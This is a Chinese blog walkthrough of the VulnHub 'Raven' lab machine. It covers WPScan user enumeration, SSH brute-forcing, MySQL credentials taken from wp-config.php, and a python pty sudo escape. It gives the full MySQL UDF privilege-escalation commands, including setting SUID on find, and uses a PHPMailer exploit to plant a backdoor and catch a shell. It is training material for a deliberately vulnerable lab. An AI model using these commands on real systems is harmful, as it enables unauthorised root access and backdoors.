码迷,mamicode.com
首页 > 其他好文 > 详细

raven靶机

时间:2020-05-07 19:31:35      阅读:59      评论:0      收藏:0      [点我收藏+]

标签:spawn   扫描   com   显示   文件   blob   右上角   file   cdb   

仅供个人娱乐

靶机信息

Raven 下载地址:https://www.vulnhub.com/entry/raven-1,256/

一、主机探测

技术图片

端口信息

技术图片

目录扫描

技术图片

80端口

技术图片

根据页面开始搜寻有用的信息

技术图片
技术图片

得到信息

技术图片

Wpscan漏洞利用

右上角BLOG ,会发现是 WordPress 系统。于是使用 WPScan 进行扫描

wpscan --url http://192.168.204.131/wordpress/  -ep -et -eu

-ep  枚举插件信息

-et  扫描主题

-eu  枚举用户

结果的到wordpress目录 用户等   用户有steven 和michael

技术图片
技术图片

发现靶机上的两个用户名:steven 和michael

使用ssh爆破  密码使用rockyou.txt

(重置虚拟机 ip改为 192.168.204.131)

技术图片

将文件复制到root目录  并且解压

技术图片
技术图片

使用弱口令michael/michael 尝试登陆ssh

技术图片

查看是否能用sudo提权,内核提权等等

技术图片
技术图片

一步一步    寻找有用信息

技术图片

查看wp-config.php,发现mysql用户名以及密码 root/R@v3nSecurity

技术图片

netstat -anpt
查看开放的端口,发现开放3306

技术图片

进入数据库

root/R@v3nSecurity

技术图片

信息收集

技术图片
技术图片
技术图片

cmd5 破解

技术图片

ssh登录

技术图片

使用sudo python -c ‘import pty;pty.spawn("/bin/bash")’ 绕过限制,获得管理员权限

技术图片

mysql udf 提权

ps -ef | grep mysql

ps -ef是以全格式显示当前所有的进程

grep 命令用于查找文件里符合条件的字符串

技术图片

查看mysql udf漏洞的利用exp

技术图片

进入kali apache的根目录

技术图片

将文件复制到html目录

技术图片

进行编译

gcc -g -c 1518.c

gcc -g -shared -Wl,-soname,1518.so -o 1518.so

技术图片

靶机切换tmp目录
靶机wget下载       kali编译生成的1518.so

技术图片

连接数据库

技术图片

use mysql;

create table foo(line blob);

insert into foo values(load_file(‘/tmp/1518.so‘));

select*fromfoo into dumpfile‘/usr/lib/mysql/plugin/1518.so‘;

create function do_system returns integer soname‘1518.so‘;

select*from mysql.func;

selectdo_system(‘chmod u+s /usr/bin/find‘);

exit

touch finn

find finn -exec"/bin/sh" \;

whoami

 

技术图片
技术图片
技术图片
技术图片

获得权限成功

打开http://192.168.204.131/vendor/

根据网页查找有用信息

技术图片
技术图片

searchsploit PHPMailer查看是否有漏洞,发现有漏洞利用脚本

技术图片

复制到 /root

技术图片

修改文件

技术图片
技术图片

(个人电脑问题,kali安装pip3,pip3 install requests-toolbelt)

脚本更名为 1.py   将脚本放置于/root

技术图片

cd  /root
python3 1.py

技术图片

访问http://192.168.204.131/contact.php

此时就会生成后门文件backlion.php

技术图片

接着访问后门文件:http://192.168.204.131/backlion.php

技术图片

进行监听 获取shell

技术图片

raven靶机

标签:spawn   扫描   com   显示   文件   blob   右上角   file   cdb   

原文地址:https://www.cnblogs.com/bingtang123/p/12838381.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!